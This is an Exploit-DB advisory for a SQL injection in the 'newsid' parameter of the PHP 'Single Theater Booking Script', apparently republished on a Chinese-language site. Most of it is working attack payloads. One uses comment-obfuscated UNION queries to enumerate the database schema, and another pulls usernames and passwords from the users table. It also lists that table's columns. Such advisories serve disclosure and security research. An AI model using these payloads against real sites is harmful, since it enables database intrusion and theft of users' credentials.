Single Theater Booking Script – ‘newsid’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-03-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41514/
  • # # # # # 
    # Exploit Title: Single Theater Booking Script - SQL Injection
    # Google Dork: N/A
    # Date: 06.03.2017
    # Vendor Homepage: http://www.phpscriptsmall.com/
    # Software : http://www.phpscriptsmall.com/product/single-theater-booking-script/
    # Demo: http://www.theaterbookingscript.com/demo/theater-booking/single-theater/
    # Version: N/A
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/news_desc.php?newsid=[SQL]
    # For example;
    # -7'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6-- -
    # users :user_id
    # users :email
    # users :user_name
    # users :password
    # users :mobile
    # users :country
    # users :state
    # -7'+/*!13337union*/+select+1,/*!13337concat*/(0x496873616e2053656e63616e203c62723e,user_name,0x3a,password),3,4,5,6+from+users-- -
    # # # # #